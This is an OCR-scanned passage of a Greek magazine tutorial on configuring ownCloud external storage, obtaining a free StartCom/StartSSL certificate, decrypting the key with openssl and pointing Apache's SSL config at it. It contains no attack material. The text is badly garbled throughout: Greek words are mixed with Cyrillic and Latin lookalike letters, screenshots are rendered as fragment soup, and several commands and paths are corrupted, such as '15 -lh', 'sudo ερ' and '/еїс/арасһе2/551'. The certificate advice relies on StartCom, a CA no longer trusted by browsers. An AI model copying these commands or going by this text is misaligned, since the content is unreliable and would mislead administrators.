Την πρώτη фора που θα επιχειρήσουµε σύνδεση σε λογαριασμό rou ownCloud, ως 
username θα δώσουμε "admin" (χωρίς τα εισαγωγικά) κι ως password εκείνο που 
φαίνεται στην κονσόλα, καθώς συνδεόµαστε ото VPS µέσω SSH. H πρώτη µας δου- 
Лела θα πρέπει να είναι η αλλαγή αυτού του προκαθορισµένου password: αρκεί ένα 
κλικ στο admin (πάνω δεξιά) και η επιλογή του Personal. 


Μετά την επιτυχή αλλαγή password, καλό εἶναι από µια κονσόλα να διαγράψουµε то 
αρχείο /etc/motd.tail: 


admin@eyjafjallajokull:-$ sudo rm /etc/motd.tail 


Όπως εἰναι εξαρχής ρυθµισµένο To ownCloud, δεν βλέπει καταλόγους του τοπι- 
κού filesystem παρά μόνον εκείνους που είναι κάτω από τον /var/www/owncloud/ 
data/username/files. Αυτό αλλάζει, ενεργοποιώντας την εφαρµογή "External storage 
support": Πάνω αριστερά στο web panel του ownCloud κάνουμε κλικ δίπλα апо το 
logo, επιλέγουμε ro Apps και πηγαίνουμε στην κατηγορία Not enabled. Εκεί Bpi- 
σκουµε την προαναφερθείσα εφαρμογή. Την ενεργοποιούµε µε ένα κλικ στο κουμπί 
Enable, κάτω апо την περιγραφή της. 


53 


kull.parabing.com/index php/settings/app 


| Enabled 
External Storage support 


Not enabled 


by Robin Appelman. Michael Gapczynski, Vincent Petry (AGPL-licensed) 


Recommended v 


This application enables administrators to configure con ета! storage pro 
Multimedia ν Drive, Dropt 
able and can m 


PIM ownCloud 


Productivity 


Game 
с entation and the Exte 
Tool ocumenta Admin Documentation 


Enable 
other 


External user support 


by Robin Appelman (AGPL-licensed) 
м 


Use external user authentication methods 


Enable 


Ενεργοποίηση της εφαρµογής "External storage support", η οποία θα µας 
επιτρέψει να δείξουµε στο ownCloud τους καταλόγους στους οποίους είναι 
προσαρτηµένα τα buckets του Storage Qloud. 


Ακολούθως δίνουμε admin > Admin > External Storage. Για κάθε εξωτερικό µέσο 
αποθήκευσης ñ τοπικό κατάλογο που θέλουμε va δώσουμε στο ownCloud, ορίζουμε 
τα ακόλουθα: 


* Folder name. Ένα буора του νέου µέσου, για το ownCloud. Εμείς, T.X., TOV κατά- 
λογο µε ra video tutorials τον ονοµάσαμε 'deltaCast". 


* External storage. Το είδος του νέου µέσου (π.χ., Amazon 53 and compliant, 
Dropbox, Google Drive κ.ο.κ.) Το κατάλληλο είδος για ro µέσο που τώρα θέλου- 
ре να ορίσουμε είναι το Local. 


* Configuration. Παράμετροι, ανάλογα µε το εἶδος rou µέσου αποθήκευσης. Av, 
TLX., προηγουμένως επιλέξαμε SFTP (FTP µέσω SSH), δίνουμε τώρα τη διεύ- 
θυνση του απομακρυσμµένου host, όνομα χρήστη και password - ίσως και τη 
διαδρομή ενός καταλόγου στο απομακρυσμένο μηχάνημα. Εμείς ως µέσο επι- 
λέξαμε το Local, οπότε oro Configuration χρειάστηκε να δώσουμε την πλήρη 
διαδρομή του τοπικού καταλόγου (/mnt/sgloud/deltaCast). 


* Available for. Ποιοι χρήστες του ownCloud έχουν πρόσβαση στο νέο µέσο; Па 
τις δικές µας ανάγκες ζητήσαμε να έχουν πρόσβαση μόνον όσοι ανήκουν στο 
group ονόματι admin. 
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пез п 505 «9 


External Storage 
Configuration Checks 


Federated Cloud Sharing 


Mail Templates 


Add storage . 


Me τη βοήθεια της εφαρµογής External Storage ορίζουμε δύο νέα µέσα αποθήκευσης τύπου 
Local. Στο παράδειγμά µας πρόκειται για τους δύο καταλόγους, σε καθέναν από τους οποίους 
είναι προσαρτηµένο ένα bucket του Storage Qloud. Στο ένα bucket βρίσκονται τα τεύχη του 
περιοδικού (σε µορφή PDF) και στο άλλο ra video tutorials που παράγουµε για τους συνδρομητές. 


Όταν τελειώσουμε µε τους ορισμούς των νέων -για то ownCloud- µέσων αποθή- 
κευσης, μπορούμε va τα δούμε από την περιοχή Files. То кало µε το ownCloud είναι 
ότι επιτρέπει τη δηµιουργία expiring links για αρχεία ή ολόκληρους καταλόγους - κι 
αυτό µας διευκολύνει στη διανοµή τευχών και video tutorials. 


Υπογεγραμμένο πιστοποιητικό για το ownCloud 


Αν θέλαμε το ownCloud µόνο για προσωπική χρήση, τότε μάλλον θα μπορούσαμε 
να ζήσουμε µε το προῦπάρχον self-signed πιστοποιητικό. Όμως την εγκατάσταση 
του ownCloud που παρουσιάζουμε, ουσιαστικά τη χρησιμοποιούν όλοι οι αναγνώ- 
στες του περιοδικού µε ενεργή συνδρομή. To να παίρνουν προειδοποιήσεις στους 
browsers όποτε επιχειρούν να κατεβάσουν ένα τεύχος ή éva video tutorial, προφα- 
νώς είναι κάτι που δεν μπορούμε να ανεχτούμε. 


Γενικά, éva έγκυρο πιστοποιητικό το οποίο εἶναι υπογεγραμμένο από µια ἐμπιστη 
Αρχή Πιστοποίησης, δεν παρέχεται δωρεάν. Υπάρχουν όµως κι εξαιρέσεις. Η εται- 
peia StartCom (http://www.startssl.com), για παράδειγµα, παρέχει δωρεάν πιστο- 
ποιητικά για έναν ολόκληρο χρόνο (StartSSL Free Class 1). Προκειμένου να ano- 
κτήσουµε éva δωρεάν πιστοποιητικό για το domain µας από τη StartCom, αρχικά 
επισκεπτόµαστε το δικτυακό τόπο της εταιρείας και δημιουργούμε ένα προσωπικό 
πιστοποιητικὀ. Αυτό το πιστοποιητικό αποθηκεύεται στον web browser που χρησι- 
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μοποιούμε, µας ταυτοποιεί και λειτουργεί ως authentication token προκειµένου να 
έχουµε πρόσβαση στις υπηρεσίες της StartCom. Προφανώς, μπορούμε -και про- 
τείνεται- να δημιουργήσουμε ёха αντίγραφο εφεδρείας του εν λόγω πιστοποιητι- 
κού ή/και να то μεταφέρουμε σε άλλον web browser. 


Πα τα subdomains των domains που έχουµε στην κατοχή µας, η StartCom µάς επι- 
τρέπει να παράγουµε δωρεάν, έγκυρα πιστοποιητικά (Class 1). Εμείς, T.X., κατέχου- 
µε το domain ονόματι parabing.com και µε τη βοήθεια της StartCom πήραμε éva 
πιστοποιητικό για το subdomain ονόματι eyjafjallajokull.parabing.com (παλαιότερα 
είχαμε πάρει κι éva και για то icebox.parabing.com). Σημειώνουμε πως ra δωρεάν 
πιστοποιητικά της StartCom είναι κατάλληλα "μόνο για ένα subdomain για κάθε 
domain. Αν θέλουμε éva πιστοποιητικό για το domain και κάθε πιθανό subdomain 
του (π.χ. parabing.com, www.parabing.com, welcometo.parabing.com к.ӧ.к.), τότε 
στρεφόµαστε στα Class 2 certificates που κοστίζουν 59,90 δολάρια για δύο έτη. Σε 
κάθε περίπτωση, αφού γίνει έλεγχος της ιδιοκτησίας του domain και πάρουμε TO 
πιστοποιητικό µας, καταλήγουμε µε τέσσερα αρχεία: 


* ca.pem- ro δημόσιο πιστοποιητικό της StartCom 

* sub.classl.server.ca.pem - το ενδιάμεσο πιστοποιητικό της StartCom 

* eyjafjallajokull.asc.key - το ιδιωτικό κλειδί για το πιστοποιητικό µας 

e eyjafjallajokull.crt - το πιστοποιητικό του domain µας κι ενός subdomain του. 


Το πού πηγαίνουν τα τέσσερα αυτά αρχεία καθώς και το πώς τροποποιούμε TO 
configuration file του Apache για ro ownCloud, шоте αντί για ro self-signed πιστοποι- 
ητικό να λαμβάνεται υπόψη αυτό που μόλις αποκτήσαµε, Өа To δούμε σε λίγο. Προς 
το παρόν, προτείνουμε va ρίξετε µια ματιά σε μερικά screenshots апо τη διαδικασία 
λήψης δωρεάν πιστοποιητικού από τη StartCom. 


Διαδικασία λήψης Class 1 certificate από StartCom 


Σήµερα θα παραγγείλουµε ένα δωρεάν υπογεγραμμένο πιστοποιητικό Class 1 апо 
τη StartCom, για ro eyjafjallajokull.parabing.com. Αντί για authentication µε username 
και password, στις υπηρεσίες της StartCom αποκτάµε πρόσβαση µε χρήση του Às- 
γόμενου προσωπικού πιστοποιητικού (personal certificate). Προκειμένου να µας 
δοθεί το εν λόγω πιστοποιητικό, θα χρειαστεί να παράσχουµε στοιχεία όπως OVO- 
ματεπώνυμο, ταχυδρομική διεύθυνση, email επικοινωνίας κ.ά.Στο email Ва µας ano- 
σταλεί éva verification code, το οποίο θα πληκτρολογήσουµε στη σχετική θυρίδα. To 
ιδιωτικό κλειδί TOU πιστοποιητικού µας παράγεται από τον (біо τον web browser kat 
για την ολοκλήρωση της διαδικασίας ενδέχεται να χρειαστεί λίγος χρόνος. 


Προσοχή: Па το είδος του κλειδιού φροντίστε να εἶναι επιλεγμένο ro High Grade. 
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Θα έχουµε σε λίγο ένα 
δωρεάν, έγκυρο και 
υπογεγραμμένο anó τη 
StartCom πιστοποιητικό, 
για Το parabing.com κι ένα 
ακριβώς subdomain του. 


StartSSL" - The Swiss Officer's Knife of Digital Certificates δι РКІ 


Welcome to StartSSL" РКІ 


StartSSL" is the trade mark of the StartCom? Certification Authority - a leader of the digital certification industry We provide you 
with everything from free low-assurance SSL certificates up to the most advanced PKI and security solutions for your business and 


Γη 


it Encryption, 2 Years validity 
Legitimate SSL/TLS + S/MIME + Object Code 
Wild Cards, Multiple Domain Names (UCC) 
Unlimited Certificates - US$ 59.90 


128/256-bit Encryption, 1 Year Validity 
Legitimate SSL/TLS + S.MINE Certificates 
No Charge, Unlimited + 100 % Free 
Start8SL" 
128/256-bit Encryption, 2 Years validity % 


Highest Level Third Party Assurance. 
Green Extended Trust Indicator 


[a ltiple Domain Names (UCC) 
edial Offer ` USS 199.90 
Hardware J T 


StartsSU" High Level Protection 
No MDS Hashes, Weak Key Scans 
Minimum 2048-bit Strong RSA Keys 


Aladdinas smart Cards + Reader MS 
Original Driver Software + ΡΚΙ Client 
Enterprise PKI Customized Solutions 


StartSSL"' Authentication SSL Protected 
Open identity authentication Provider 
Click here to log into your. 

StartSSL" Account 


|_stortcom Ноте | SENIN  seesscons | stessi мот | cg 


Vy Sanc 


StartSSL” - The Swiss Officer's Knife of Digital Certificates δι РКІ 


Congratulations! 


. е client certificate has been installed into your browser. This is a bootstrapping certificate for Identity Card. 
R lec pue = 

To τ κά С πρ Επιστ C πατε 

πιστοποιητικό -ή αλλιώς εν Wore — * 

client certificate— είναι ' = Hr Digital identity — € 

έτοιμο. Παρουσία του кы — je Елый манабы F 

ταυτοποιο ύ μαστε στη Α Your personal certificate has been installed. You should keep a backup copy of this certificate. ТГТУ 


ок 


StartCom. 


4.) How do 1 backup my client certificates? 


Firefox: Select "Preferences|Options" -> "Advanced" -> "Encryption" -> "View Certificates", choose the "Your Certificates" tab 
and locate your client certificate from the list. The certificate wil be listed under StartCom. Select the certificate and click on 
"Backup", choose a name for this backup flle, provide a password and save it at a known location. Now you should either burn this 
fle to a CD ROM or save it on a USB stick or smart card. Thereafter delete this file from your computer. 


Internet Explorer: Select from "Tools" -> "Internet Options" -> "Content" -> "Certificates" -> "Personal" and locate your chent 
certificate from the list. Click on "Export" -> "Next" -> "ies, export the private key" -> "Next" -> "Next". Choose a password for your 
Не and click "Next", choose а name for this backup file and save it at a known location. Now you should either burn this file to a CD 
ROM or save it on a USB stick or smart card. Thereafter delete this fle from your computer. 


d sans 


Opera: Select from "Settings" -> "Preferences" -> "Advanced" -> "Security" -> "Manage Certificates" -> "Personal". Click on 
"Export" and choose a пате for this backup file. Make sure to choose the .p12 for PKCS12 extension, not the default .usr. 


Safari (on OS X): Select the private key and the certificate together in your keychain and export as a PKCS12 file. 


Google Chrome: Click on the "Options" icon in the upper left (. Select "Settings" from the menu. Click on "Advanced Settings" 
and then in the HTTPS/SSL section, click on the "Manage certificates..." button. Select the certificate(s) you want to export. click on 
the "Export..." button and follow the prompts from the Export Certificate Wzard that pops up. Make sure to include the private key 
as well, export as .p12 file. 


ΕΕ. m ασ ` 


General Таб Search Content Applications Privacy Security — Sync 


r with Firetox when trying to login. z 


| To client certificate είναι 
εγκατεστημένο στον web 

| browser που ro παρήγαγε. 

| Προτείνεται να κρατήσουμε 
ένα αντίγραφο εφεδρείας – 
| Κι εννοείται ότι μπορούμε 
γα μεταφέρουμε то 
πιστοποιητικό και σε άλλον 


u don't have а valid client certificate installed in your 
luced and installed in your browser. IF you want to switch to a 
certificate including the private key and import into the 

ferences -> Advanced -> Encryption -> View Certificates -> 


General Data Choices Network [Update Certificates | 


When a server requests my personal certificate: 


Ὁ Select one automatically @ Ask me every time 


gested to obtain a smart card or eToken in order to store 


Query OCSP responder servers to confirm the current validity of c| fb Cerificate [:1 599) 


[pem Your Cerificsaes Bes [Servers [Authoris [дев 


You have certificates from these organizations that identify you: 


———M——M 
aSanCom Là browser. 
chistosvardisp.. Software Security Dev, DATI 19/216 


=F 


expired yet). Contact the CertMaster 
orginal account, 
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Апо το Control Panel της StartCom έχουμε, μεταξύ άλλων, τη δυνατότητα να επικυ- 
ρώσουμε ro domain µας (καρτέλα Validations Wizard) και κατόπιν να πάρουμε ένα 
υπογεγραμμένο πιστοποιητικό για то {бао domain (καρτέλα Certificates Wizard). 


О ο es joo]. To Control Panel της StartCom. 


StartSSL™ - The Swiss Officer's Knife of Digital Certificates δι РКІ 


Howdy Christos Varelas! Welcome to your StartSSL” Control Panel... ri 


Identity Card * 
Thousands of subscribers already validated their identity and benefit today from the advanced capabilities of the Class 2 and 
EV level certificates. For features like wild cards (*.domain.com) and multiple domain names (UCC/SAN/SNI) please validate. e Organization » 
your identity and benefit even more from StartSSL ". Click on "Validations Wizard" -» "Identity Validation -> "Class 2° 
{;  WorCommumty — # 
Getting Started: 
а Digital Identity + 
1. validate 
[& Email validations — + 
In order to receive a certificate you must validate an email address or domain name first. Choose the "Validations 
Wizard” tab for this task. [ð ^ Domain validations + 


2. Certificate 


Mer йшй 5 sñ елй or domain select tha "Certificates πάς tab, Continue with the apgropiiste verticale 

type you wish to receive. F 

3. Various 

The "Tool Box" has many ditterent tools which сап help you. Here you can tind help items, update your OpenID settings, 9 ELLO Ф 


add a credit card, manage your pnvate keys (decryption), convert а certficate to PFX (for IIS servers) and much more... 


StartSSL" he Swiss Officer's Knife of Digital Certificates & PKI 


Πρώτα πηγαίνουμε στην == 2 ma 


καρτέλα Validations Wizard 
και ζητάμε επικύρωση 
domain: Απλά θέτουµε Туре 
= Domain Name Validation 
και κάνουμε ένα κλικ στο 
Continue. 


Select Validation 


Identity Card 


* Select the type and attribute of validation you'd like to perform, 
* Please note that you might need to have instant access to your email accountis) or documents in image format ready. 


Organization 


WoT Community. 


Type: [Domain Name validation. Ы 


Digital Identity 


mail validations 


||! + )\\+| |+ {95 


eee [e 


Domain Validations 


Е 


S/MIME Client 


µη 


This wizard will quide you through the process of validating your domain names. You can always view your validated 
domain names by opening the "Domain Validations" at the right hand panel. 


Validations 
Wizard 


2 Erter the domain name you want to have validated == 
* You must be the owner of the top-level domain, sub domains are not supported. [1 Organization 


@ Identity card 


Enter Domain Name 


Ф 


Ακολούθως πληκτρολογούµε το 
όνοµα του domain µας και στα 
δεξιά επιλέγουμε To top-level 
domain. Παρατηρήστε ότι εδώ 
δεν καθορίζουµε subdomain. Το 
δωρεάν, Class ] πιστοποιητικό 
που πρόκειται να πάρουμε, αφορά 
στο domain και σε "ένα μόνο’ 
subdomain. Το ίδιο Το subdomain 
Ва ro καθορίσουμε σε λίγο. 


(; WoT Community 


http:// [parabing ΠΕΠ E 


|d- Digital Identity Ф 


le Email Validations + 


|ó) — Domain validations + 


S/MIME Client 
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Από μία λίστα προκαθορισµένων διευθύνσεων email, επιλέγουμε µία έγκυρη για TO 
domain.>'qurTñ τη διεύθυνση πρόκειται ναλάβουµε ένα email µε άλλο éva verification 
code. Παρεμπιπτόντως, vta TO parabing.com δεν υπήρχε καμία διεύθυνση email апо 
τις προκαθορισμένες. Ορίσαµε όµως τη hostmaster@parabing.com να εἶναι alias της 
(υπαρκτής) talk2us@parabing.com kat προχωρήσαµε µε την προαναφερθείσα. (Το 
email για το parabing.com είναι hosted апо το Google Apps.) 


Validations 
Wizard 


* Select the email address for verification of domain ownership from below. 


Επιλογή διεύθυνσης email, 
στην οποία θα µας αποσταλεί 
verification code για την 
επαλήθευση της ιδιοκτησίας 
του domain. 


Select Verification Email 


Verification Email: © postmasterGparabing.com 


© hostmastergparabing.com 

© webmasterGparabing.com 

© abusegenom.com 

© bywhbljgiGwhoisprivacyprotect.com 


Σε λίγα λεπτά θα λάβουμε 
εκείνο το email µε TO 


Validations 
Wizard 
еркин verification code, Το οποίο ка! 


* A verification code has been sent to "hostmaster@parabing.com". 0a πληκτρολογήσουμε στην 
* Please check your email account now and enter the code into the text field below. А А А 
κατάλληλη θυρίδα, στο site της 


Verification Code: mes | StartCom. 


Και μόλις επαληθεύτηκε ότι 
πράγματι είµαστε οι κάτοχοι 
του parabing.com. Έφτασεη 
ώρα να ζητήσουμε ένα όμορφο, 
φαρδιά-πλατιά υπογεγραμμένο 
πιστοποιητικό. 


Validations 
Wizard 


* You have successfully authenticated domain "parabing.co, 
š bu wil be able to use this vericaton for the пек 30 days, after which it expres and must be renewed. 


82 Га 


Identity Card 


Validation Success 


Organization 


WoT Community 


Digital Identity 


Email Validations 


Sle S Пее 
«||15||135||5|||8}}|55. 


Domain Validations 


» 


S/MIME Client 


Certificates 
Wizard š 


* Make sure you have already validated a domain name or email address before using this tool! Select the "Validations 


Wizard" for this task. Παραμένοντας ото Control 
* Depending on your preferences and type of software, you need to have a prepared certificate request (CSR) ready for Panel της StartCom, πηγαίνουμε 


Select Certificate Purpose 


submission. p : 
στην καρτέλα Certificates 
Certificate Target: [Web Server SSUTLS Certificate Iz] Wizard. Φροντίζουµε ωστε να 
ισχύει Certificate Target = Web 
Server SSL/TLS Certificate. 


SSL/TLS web server certificates are mostly used by web servers to secure communication across a network and to 
prevent eavesdropping, tampering and message forgery. Additionally server certificates identify the operator of the 

ФӘ server at various levels, which allows а relaying party (visitors) to gain verified information about the owners of the 
pe site. This is essential for trading (e-business) on the Internet and provides a trust factor otherwise difficult to 
obtain. 
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бойды: Λίγο πριν τη δημιουργία του 
Wizard ἡ ιδιωτικού κλειδιού yta то 
πιστοποιητικό µας, ορίζουμε ένα καλό 
password που θα To προστατεύει. 


Generate Private Key 


* if you created your own private key and certificate request (CSR), please skip this step. 


š Provide а password for your private key (At least 10 characters, тах 32) Τις παραμέτρους Keysize και Secure 
* Allowed are only letters and numbers, without spaces! j: ή 

* Wite your password down somewhere securely. Hash Algorithm τις αφήνουμε ως 

* Note that the SHA1 hash algorithm may not be supported with newer browsers and operating systems. έχουν (2048 (Medium) και SHA2 


(Default) αντίστοιχα). 


Key Password: 
Confirm Password: |е; 
Keysize: | 2048 (Medium) τ 
Secure Hash Algorithm: | 5ΗΑ2 (Default) τ 


=== 


At this step a private key is generated for your cë 
private key. 


insteac 


Δεν είχαμε δημιουργήσει 
certificate signing request 
(αρχείο CSR) στο VPS µας, οπότε 
σ' αυτό το στάδιο κάναμε ένα 
κλικ στο OK ώστε να ξεκινήσει η 
παραγωγή του κλειδιού. 


Το ιδιωτικό κλειδί για το πιστοποιητικό είναι έτοιμο και τώρα πρέπει να αντιγρά- 
Ψουμε όλα” τα περιεχόμενα του πλαισίου που το περιλαμβάνει, σε éva αρχείο 
απλού κειµένου στο VPS µας. Χρειάζεται ιδιαίτερη προσοχή εδώ ώστε κατά то 
copy-paste να µην αφήσουμε κάποιον χαρακτήρα εκτός, αλλά va µην εισάγουµε και 
κανέναν άλλον. Στις οδηγίες ото site της StartCom προτείνεται να αποθηκεύσουμε 
το νέο αρχείο µε то буора ssl.key, αλλά καλύτερα уа TOU δώσουμε ένα πιο αντιπρο- 
σωπευτικό буора όπως, T.X., eyjafjallajokull.key. To ιδιωτικό κλειδί είναι σε κρυπτο- 
γραφημένη µορφή και για va ro αποκρυπτογραφήσουµε πληκτρολογούμε: 


admin@eyjafjallajokull:-$ openssl rsa -in eyjafjallajokull.key -out 
eyjafjallajokull.asc.key 


Enter pass phrase for eyjafjallajokull.key: 

writing RSA key 

admingeyjafjallajokull:-$ 15 -lh eyjafjallajokull.* 

-rw-rw-r-- 1 admin admin 1.7K Mar 19 15:08 eyjafjallajokull.asc.key 
-rw-r--r-- 1 admin admin 1.8K Mar 19 15:08 eyjafjallajokull.key 
admingeyjafjallajokull:-$ 


Oa χρειαστεί va δώσουμε το password που προστατεύει το κλειδί (το εἰχαμε καθο- 
ρίσει προηγουμένως). Σε περίπτωση που η αποκρυπτογράφηση αποτύχει, π.χ., ETEL- 
δή έχουν περάσει акоро! χαρακτήρες oro eyjafjallajokull.key, μπορούμε να στραφού- 
µε στο σχετικό εργαλείο που υπάρχει στην καρτέλα Tool Вох, στο Control Panel της 
Start SSL (βλ. παρακάτω). Σημειώνουμε εδώ ότιτο αποκρυπτογραφημένο ιδιωτικό 
κλειδί «δεν: πρέπει να διαρρεύσει — και το (Oto θα πρέπει να ισχύει ακόµη και για 
την κρυπτογραφηµένη του εκδοχή. 
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Certificates z , И ç 
[m Went [=>] ΕΠ Ιδού το ιδιωτικό µας κλειδί για 
Save Private Key To domain, σε κρυπτογραφημένη 
* Copy and paste the content from the textbox below into a file and save it as ssl. ke e — ы А 4 5 
Mie Hep асрат nasi wa e Er diei a АӨ νον η m =) μορφη. Στο στιγμιότυπο ἔχει 
ΗΝ μι μι ως. — προστεθεί και το έξτρα μέτρο 
së WoT Community * f, P 
x= SEGNRERPRVREKEY— z є ======»__ проотаоїас̧ του blur :D 
|Proc-Type: 4,ENCRYPTED [d Digital Identity * 
IDEK-Info: AES- po «CBC,4A6450AF27C8385A671B0F146D20C8E3 
e Email Validations * 
ld) ^ Domain validations * 
P 
[5] S/MIME Client * 


Πριν πάρουμε ro δημόσιο πιστοποιητικό µας ñ απλά πιστοποιητικό, οφείλουμε να 
του προσθέσουμε ακριβώς éva subdomain. Εμείς, π.χ. εἰχαμε το domain ονόματι 
parabing.com (domain), οπότε πληκτρολογήσαμε 'eyjafjallajokull" (χωρίς τα εισα- 
γωγικά) κι έτσι στο πιστοποιητικό προσθέσαµε το eyjafjallajokull.parabing.com 
(subdomain). 


Καθορισμός subdomain για Το калыны 
πιστοποιητικό µας. Wizard E 


Add Domains 


* You must add one sub domain to this certificate. 

* The base domain parabing.com will be included by default in the Alt Name section. 

* Note: In order to add multiple domains and sub domains, your Identity must be at least Class 2 validated. Check your 
status at the "Identity Card". 


http:// [syiafiallajokull | parabing.com 


Το πιστοποιητικό µας είναι έτοιμο για 


[eee] Certificates ë P υπογραφή από тп StartCom - yta την 
vazand ακρίβεια, από την αντίστοιχη Αρχή 
σας ProcessbimCertilicuds Πιστοποίησης. Θα είναι Κατάλληλο 
για ro parabing.com, καθώς και για 


* We have gathered enough information in order to sign your certificate now. 


* The common name of this certificate will be set to eyjafjallajokull.parabing.com. ro eyjafjallajokull.parabing.com. 
* The certificate will have the following host names supported: 1 n H 
1. parabing.com Па &va πιστοποιητικό που θα ήταν 
2 fjallajokull., bing. Ζ ῃ ͵ 
«жылкы process the ceriicate Κατάλληλο για ro domain kat κάθε 
πιθανό subdomain, χρειαζόμαστε ένα 
Class 2 certificate (µε κόστος 59,90 


δολάρια ανά δύο έτη). 


Σ’ αυτό το σηµείο έχουμε ολοκληρώσει επιτυχώς τη διαδικασία υποβολής αιτήµα- 
τος για πιστοποιητικό. Δεν μπορούμε όµως ча то έχουµε ακόµα — ὀχι τόσο γρήγορα. 
H αἰτησή µας πρέπει πρώτα να εγκριθεί απὀ το προσωπικό της StartCom και πλη- 
ροφορούμαστε ὁότι για va γίνει αυτό ενδέχεται να περάσουν έως και τρεις ώρες. 
Μέσα o' αυτό το διάστηµα είναι πιθανό να κληθούμε για την υποβολή πρόσθετων 
στοιχείων. Στην πράξη, εμείς εἴχαμε θετικὀ email µετά από ένα περίπου τέταρτο. Σ' 
αυτό πληροφορούμασταν ότι το πιστοποιητικό ήταν έτοιμο και υπογεγραμμένο κι 
ότι μπορούσαμε va το κατεβάσουµε апо ro Control Panel της StartCom. 
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5 Н διαδικασία έγκρισης του νέου 
Certificates n n I 
ο Wizard | ul πιστοποιητικού από TO προσωπικό 
της StartCom ενδέχεται να 
χρειαστεί έως και τρεις ώρες, 


Additional Check Required! 


You successfully finished the process for your certificate. However your certificate request has been marked for 1 σοι Ó 1 
A approval by our personnel. Please wait for a mail notification from us within the next 3 hours (the most). We might av Kat κατι μας λέει οτι γενικά 
contact you for further questions or issue the certificate within that time. Thank you for your understanding! περατωνεται πολύ πιο γρήγορα. 


Οι χρήσιμες λειτουργίες που 
παρέχονται µέσω της καρτέλας 
Tool Box, στο Control Panel της 

StartCom. 


The Toolbox 


A Identity Card + 
(B Help Items 

ΘΒ StartssL" Messages e Organization * 
О Add Credit Card | PayPal | Ticket 

З About Smart Cards/eToken |& ΜΟῚ Community * 
ч Submit verification code 

@ StartCom CA Certificates t3 Digital identity — 4 
Q Decrypt Private Key 

ж» Key Bug Checker [& Email validations — + 
Ñ Retrieve Certificate 

[8 Create PKCS#12 (PFX) File [à Domain validations + 


Revocation Request 
@ Check Fmail Account 
© Check DNS of Domain 


d Set Open Identity Preferences > 
Sl Logout. š 


S/MIME Client 


[1 SSL/TLS Server 


BS 3064 % Ë 


The Toolbox 


нер Retrieve Certificate 
elp Items 
6 StartSSL'" Messages š 
(E лач coan cara рауға | екан ° Puna ha mar tier eneg сйс icing ha ones which 
У About Smart Cards/eToken * Labels marked green have not been retrieved yet. z η 
* Submit Verification Code ° For client (5/ΜΙΜΕ) and smart card logon certificates make sure you use the Λήψη Του υπογεγραµµενου 
5 ш same browser which was used to create the request. δημόσιου πιστοποιητικού για το 
* Key Bug Checker Certificate: [syjsfjllajokull parabing.com (Server - Class 1 - 2016-03-10) [=] eyjafjallajokull.parabing.com. Είναι 
M вае сета ЭМУ αυτό που Ва βλέπουν οι clients 
Кесин едын (web browsers) ката τις συνδέσεις 
@ Check Email Account 
Ф Check DNS of Domain HTTPS προς ro ownCloud. 
d> Set Open Identity Preferences 
Logout 
~~ [t pn [η 
The Toolbox 


Σημειώνουμε ότι χρειαζόμαστε 
το πιστοποιητικό της Αρχής | Œ neip items 


StartCom CA Certificates 


Πιστοποίησης (αρχείο ca.pem) а StartSSL" Messages * if you want to import one or more CA certificates into your browser click on 
р Ё the link of the certificate in question. Make sure to edit the trust settings of 
καθώς και το ενδιάμεσο Add Credit Card | PayPal | Тіске 
1 ^ %% About Smart Cards/eToken each imported certificate. M А 
πιστοποιητικό της Αρχής | «sumi verincation code E eire eir е ы ын 
Πιστοποίησι αρχείο sub. @ StartCom CA Certificates 
Ἴσης ( PX Ὁ Decrypt Private Key * StartCom Root CA (PEM encoded) - 


classi.server.ca.pem). » Key Bug Checker 
τὲ Retrieve Certificate 


StartCom Root CA (DER encoded) 
Server Certificate Bundle with CRLs (PEM encoded) 


[8 Create PKCS#12 (PFX) File * Class 1 Intermediate Server cade 
Bj Revocation Request * Class 2 Intermediate Server CA 
(& Check Email Account * Class 3 Intermediate Server CA 
@ Check DNS of Domain * Extended Validation Server CA 


d Set Open Identity Preferences * Class 1 Intermediate Client CA 
Logout * Class 2 Intermediate Client CA 
* Class 3 Intermediate Client CA 


* Class 2 Code Signing CA 
* Class 3 Code Signing CA 


Από το Control Panel της StartCom και συγκεκριµένα απὀ την καρτέλα Tool Box, rta- 
ρέχονται το δημόσιο πιστοποιητικό µας (Retrieve Certificate), το δημόσιο πιστοποι- 
ητικό της Αρχής Πιστοποίησης, καθώς και το ενδιάµεσο πιστοποιητικό της Αρχής 
Πιστοποίησης (StartCom CA Certificates). Επίσης, μπορούμε να πάρουμε το ιδιωτικό 
κλειδί για το πιστοποιητικό µας σε "μη΄ κρυπτογραφηµένη µορφή (Decrypt Private 
Key). 
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Εγκατάσταση πιστοποιητικού 


Και µετά την όλη διαδικασία, επαναλαμβάνουµε ότι στο VPS µας θα πρέπει να 
έχουμε τέσσερα νέα αρχεία: το πιστοποιητικό για το domain και το subdomain 
(eyjafjallajokull.crt), το ιδιωτικό κλειδί για το πιστοποιητικό σε µη-κρυπτογραφηµένη 
µορφή (eyjafjallajokull.asc.crt), ro πιστοποιητικό της Αρχής Πιστοποίησης (ca.pem), 
καθώς και το ενδιάµεσο πιστοποιητικό της Αρχής Πιστοποίησης (sub.classl.server. 
ca.pem). Τα αρχεία αυτά αντιγράφουµε στον κατάλογο /etc/apache2/5ssl: 


admin@eyjafjallajokull:-$ sudo ερ eyjafjallajokull.crt eyjafjallajokull.asc.key 
ca.pem sub.class1.server.ca.pem /еїс/арасһе2/551 


Στη συνέχεια οφείλουμε va τροποποιήσουµε ελαφρώς ro configuration file του 
site που σερβίρει o Apache, για τις συνδέσεις HTTPS. Το εν λόγω αρχείο είναι то 
owncloud-ssl.conf και βρίσκεται oro /etc/apache2/sites-avallable. Με δικαιώµατα óc 
αχειριστή, το ανοίγουμε µε ro nano: 


admin@eyjafjallajokull:~$ sudo nano /etc/apache2/sites-available/owncloud-ss1. 
conf 


Εντός της ενότητας που ορίζει ro éva και μοναδικό virtual host, φροντίζουμε ώστε 
να υπάρχουν οι ακόλουθες οδηγίες: 


SSLEngine on 
SSLProtocol all -SSLv3 -SSLv2 


# Edit to point to the files provided by your CA. 
SSLCertificateFile /etc/apache2/ssl/eyjafjallajokull.crt 
SSLCertificateKeyFile /etc/apache2/ssl/eyjafjallajokull.asc.key 
SSLCertificateChainFile /etc/apache2/ssl/sub.classi.server.ca.pem 


Βεβαίως, κάποια ονόματα αρχείων ίσως διαφέρουν στη δική σας εγκατάσταση. 
Επίσης, οι γραµµές µε τις αναφορές στο εργοστασιακό self-signed πιστοποιητικό 
(apache.crt) και στο αντίστοιχο κλειδί (apache.key), πρέπει είτε να "σχολιαστούν” 
WOTE να µη λαμβάνονται υπόψη, είτε να διαγραφούν. Αποθηκεύουμε τις αλλαγές κι 
επανεκκινούµε TOV Apache: 


